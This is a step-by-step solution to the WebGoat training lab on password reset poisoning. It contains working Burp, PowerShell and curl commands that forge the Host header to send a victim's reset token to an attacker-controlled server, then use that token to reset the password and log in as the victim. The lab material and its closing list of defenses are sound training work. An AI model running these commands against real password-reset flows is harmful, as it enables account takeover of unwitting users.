===================================================================
PASSWORD RESET LINK HIJACKING - COMPLETE SOLUTION
===================================================================

CHALLENGE: Hijack Tom's password reset link by manipulating the Host header
TARGET: Reset Tom's password and login as Tom
TOOLS NEEDED: Burp Suite (or curl/PowerShell)

===================================================================
UNDERSTANDING THE ATTACK
===================================================================

When you request a password reset, the server:
1. Generates a unique token
2. Creates a reset link: http://HOST/PasswordReset/reset/reset-password/TOKEN
3. Emails the link to the user

THE VULNERABILITY:
The server uses the "Host" header to build the reset link URL.
If we change Host header from "localhost:8080" to "192.168.254.112:8002" (WebWolf),
the reset link will point to OUR server instead!

ATTACK FLOW:
1. Request reset for tom@webgoat-cloud.org
2. Intercept request and change Host: 192.168.254.112:8002
3. Tom receives email with link to YOUR WebWolf server
4. Tom clicks the link (he always does!)
5. WebWolf captures the token
6. Use token to reset Tom's password
7. Login as Tom!

===================================================================
METHOD 1: BURP SUITE (RECOMMENDED)
===================================================================

[STEP 1] Setup Burp Suite
-------------------------
1. Open Burp Suite
2. Go to Proxy > Options
3. Ensure proxy listener is on 127.0.0.1:8080
4. Configure browser to use proxy:
   - Manual proxy: 127.0.0.1:8080
   - Use for all protocols

5. In Burp, go to Proxy > Intercept
6. Click "Intercept is on"

[STEP 2] Open WebWolf
----------------------
1. Open browser: http://192.168.254.112:8002
2. Login with your WebGoat credentials
3. Navigate to "Incoming Requests" or "Requests" tab
4. Keep this tab open!

[STEP 3] Request Password Reset
--------------------------------
1. Go to WebGoat Password Reset lesson
2. Find the "Forgot your password?" form
3. Enter: tom@webgoat-cloud.org
4. Click "Submit"

[STEP 4] Intercept and Modify Request
--------------------------------------
Burp will intercept the request. You'll see:

POST /WebGoat/PasswordReset/reset/reset-password HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
...

email=tom@webgoat-cloud.org

MODIFY THE HOST HEADER:
Change: Host: localhost:8080
To:     Host: 192.168.254.112:8002

[STEP 5] Forward Request
-------------------------
1. Click "Forward" in Burp
2. Turn off "Intercept" (click "Intercept is on" to toggle off)
3. Check the response - should be success

[STEP 6] Check WebWolf for Token
---------------------------------
1. Go back to your WebWolf tab
2. Refresh the "Incoming Requests" page
3. You should see a request like:
   GET /PasswordReset/reset/reset-password/4a8b3c9d-1e2f-3g4h-5i6j-7k8l9m0n

4. Copy the TOKEN (the long string after /reset-password/)
   Example: 4a8b3c9d-1e2f-3g4h-5i6j-7k8l9m0n

[STEP 7] Reset Tom's Password
------------------------------
Use curl, PowerShell, or Burp Repeater:

PowerShell:
-----------
$token = "PASTE_TOKEN_HERE"
$newPassword = "MyNewPassword123"

Invoke-WebRequest -Uri "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/$token" `
    -Method POST `
    -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} `
    -Body "newPassword=$newPassword"

curl:
-----
curl -X POST "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/TOKEN" \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -d "newPassword=MyNewPassword123"

[STEP 8] Login as Tom
----------------------
1. Go to WebGoat login page
2. Username: tom
3. Password: MyNewPassword123 (or whatever you set)
4. Login!

[STEP 9] Verify Challenge Complete
-----------------------------------
1. Navigate back to the Password Reset lesson
2. The challenge should now show as completed!

===================================================================
METHOD 2: POWERSHELL AUTOMATION
===================================================================

[OPTION A] Run the Complete Script
-----------------------------------
cd c:\webgoat-scripts-1\
.\password_reset_COMPLETE.ps1

Follow the prompts:
1. Get JSESSIONID cookie from browser (F12 > Application > Cookies)
2. Paste when requested
3. Wait for Tom to "click" the link
4. Manually check WebWolf and paste token if needed
5. Password will be reset automatically

[OPTION B] Manual PowerShell Commands
--------------------------------------

# Step 1: Request reset with modified Host header
$headers = @{
    "Host" = "192.168.254.112:8002"
    "Content-Type" = "application/x-www-form-urlencoded"
}

Invoke-WebRequest -Uri "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password" `
    -Method POST `
    -Headers $headers `
    -Body "email=tom@webgoat-cloud.org" `
    -UseBasicParsing

# Step 2: Open WebWolf and get token
Start-Process "http://192.168.254.112:8002"
# Look for token in Incoming Requests

# Step 3: Reset password
$token = "YOUR_TOKEN_HERE"
Invoke-WebRequest -Uri "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/$token" `
    -Method POST `
    -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} `
    -Body "newPassword=HackedPassword123" `
    -UseBasicParsing

===================================================================
METHOD 3: CURL (Command Line)
===================================================================

# Step 1: Request reset with modified Host
curl -X POST "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password" \
     -H "Host: 192.168.254.112:8002" \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -d "email=tom@webgoat-cloud.org"

# Step 2: Check WebWolf (open in browser)
# http://192.168.254.112:8002

# Step 3: Reset password with captured token
curl -X POST "http://192.168.254.112:8001/WebGoat/PasswordReset/reset/reset-password/YOUR_TOKEN" \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -d "newPassword=HackedPassword123"

===================================================================
TROUBLESHOOTING
===================================================================

Q: I don't see any requests in WebWolf
A: 1. Make sure WebWolf is accessible: http://192.168.254.112:8002
   2. Check you're logged into WebWolf
   3. Try refreshing the "Incoming Requests" page
   4. Verify the Host header was actually modified in your request

Q: I get 404 on the reset password endpoint
A: Make sure you're using the correct token format (no extra characters)

Q: Password reset says "invalid token"
A: The token may have expired or been used. Request a new reset.

Q: Burp isn't intercepting requests
A: 1. Check browser proxy settings
   2. Make sure "Intercept is on" in Burp
   3. Try turning intercept off and on again

Q: Can't access WebWolf at 192.168.254.112:8002
A: 1. Verify WebWolf is running
   2. Check firewall settings
   3. Try accessing from the machine running WebWolf first

===================================================================
KEY LEARNING POINTS
===================================================================

VULNERABILITY:
- Server trusts the Host header to build URLs
- No validation that reset link points to legitimate server

REAL-WORLD IMPACT:
- Account takeover
- Password reset poisoning
- Phishing via legitimate emails

PROPER DEFENSES:
1. Use a configured base URL (not from headers)
2. Validate Host header against whitelist
3. Use signed/encrypted tokens that include domain
4. Implement rate limiting on password resets
5. Log and alert on suspicious Host headers

===================================================================
QUICK REFERENCE
===================================================================

WebGoat: http://192.168.254.112:8001
WebWolf: http://192.168.254.112:8002

Target Email: tom@webgoat-cloud.org
Modified Host: 192.168.254.112:8002

Attack Endpoint: /WebGoat/PasswordReset/reset/reset-password
Reset Endpoint: /WebGoat/PasswordReset/reset/reset-password/TOKEN

New Password: HackedPassword123 (or your choice)

Login as Tom:
- Username: tom
- Password: [your new password]
